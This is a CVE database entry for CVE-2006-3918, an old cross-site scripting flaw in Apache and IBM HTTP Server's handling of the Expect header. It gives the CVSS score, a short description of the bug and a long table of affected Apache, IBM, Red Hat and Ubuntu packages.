CVE Vulnerabilities

CVE-2006-3918

Published: Jul 28, 2006 | Modified: Jun 06, 2021
CVSS 3.x
N/A
Source:
NVD
CVSS 2.x
4.3 MEDIUM
AV:N/AC:M/Au:N/C:N/I:P/A:N
RedHat/V2
RedHat/V3
Ubuntu

http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.

Affected Software

Name Vendor Start Version End Version
Http_server Apache 1.3.18 1.3.18
Http_server Apache 1.3.19 1.3.19
Http_server Ibm 6.0 6.0
Http_server Ibm 6.1 6.1
Http_server Apache 1.3.12 1.3.12
Http_server Apache 1.3.17 1.3.17
Http_server Apache 2.2 2.2
Http_server Apache 2.2.1 2.2.1
Http_server Apache 1.3.11 1.3.11
Http_server Apache 1.3.12 1.3.12
Http_server Apache 2.0 2.0
Http_server Apache 2.0.57 2.0.57
Http_server Apache 1.3.1 1.3.1
Http_server Apache 1.3.20 1.3.20
Http_server Apache 1.3 1.3
Http_server Apache 1.3.22 1.3.22
Red Hat Certificate System 7.3 RedHat ant-0:1.6.5-1jpp_1rh *
Red Hat Certificate System 7.3 RedHat avalon-logkit-0:1.2-2jpp_4rh *
Red Hat Certificate System 7.3 RedHat axis-0:1.2.1-1jpp_3rh *
Red Hat Certificate System 7.3 RedHat classpathx-jaf-0:1.0-2jpp_6rh *
Red Hat Certificate System 7.3 RedHat classpathx-mail-0:1.1.1-2jpp_8rh *
Red Hat Certificate System 7.3 RedHat geronimo-specs-0:1.0-0.M4.1jpp_10rh *
Red Hat Certificate System 7.3 RedHat jakarta-commons-modeler-0:2.0-3jpp_2rh *
Red Hat Certificate System 7.3 RedHat log4j-0:1.2.12-1jpp_1rh *
Red Hat Certificate System 7.3 RedHat mx4j-1:3.0.1-1jpp_4rh *
Red Hat Certificate System 7.3 RedHat pcsc-lite-0:1.3.3-3.el4 *
Red Hat Certificate System 7.3 RedHat rhpki-ca-0:7.3.0-20.el4 *
Red Hat Certificate System 7.3 RedHat rhpki-java-tools-0:7.3.0-10.el4 *
Red Hat Certificate System 7.3 RedHat rhpki-kra-0:7.3.0-14.el4 *
Red Hat Certificate System 7.3 RedHat rhpki-manage-0:7.3.0-19.el4 *
Red Hat Certificate System 7.3 RedHat rhpki-native-tools-0:7.3.0-6.el4 *
Red Hat Certificate System 7.3 RedHat rhpki-ocsp-0:7.3.0-13.el4 *
Red Hat Certificate System 7.3 RedHat rhpki-tks-0:7.3.0-13.el4 *
Red Hat Certificate System 7.3 RedHat tomcat5-0:5.5.23-0jpp_4rh.16 *
Red Hat Certificate System 7.3 RedHat xerces-j2-0:2.7.1-1jpp_1rh *
Red Hat Certificate System 7.3 RedHat xml-commons-0:1.3.02-2jpp_1rh *
Red Hat Enterprise Linux 2.1 RedHat apache *
Red Hat Enterprise Linux 3 RedHat httpd-0:2.0.46-61.ent *
Red Hat Enterprise Linux 4 RedHat httpd-0:2.0.52-28.ent *
Red Hat Network Proxy v 4.2 (RHEL 3) RedHat jabberd-0:2.0s10-3.37.rhn *
Red Hat Network Proxy v 4.2 (RHEL 3) RedHat rhn-apache-0:1.3.27-36.rhn.rhel3 *
Red Hat Network Proxy v 4.2 (RHEL 3) RedHat rhn-modperl-0:1.29-16.rhel3 *
Red Hat Network Proxy v 4.2 (RHEL 4) RedHat jabberd-0:2.0s10-3.38.rhn *
Red Hat Network Proxy v 4.2 (RHEL 4) RedHat rhn-apache-0:1.3.27-36.rhn.rhel4 *
Red Hat Network Proxy v 4.2 (RHEL 4) RedHat rhn-modperl-0:1.29-16.rhel4 *
Stronghold 4 for Red Hat Enterprise Linux RedHat stronghold-apache *
Apache Ubuntu dapper *
Apache Ubuntu edgy *
Apache Ubuntu feisty *
Apache2 Ubuntu dapper *
Apache2 Ubuntu devel *
Apache2 Ubuntu edgy *
Apache2 Ubuntu feisty *
Apache2 Ubuntu gutsy *
Apache2 Ubuntu hardy *
Apache2 Ubuntu intrepid *
Apache2 Ubuntu jaunty *
Apache2 Ubuntu karmic *

References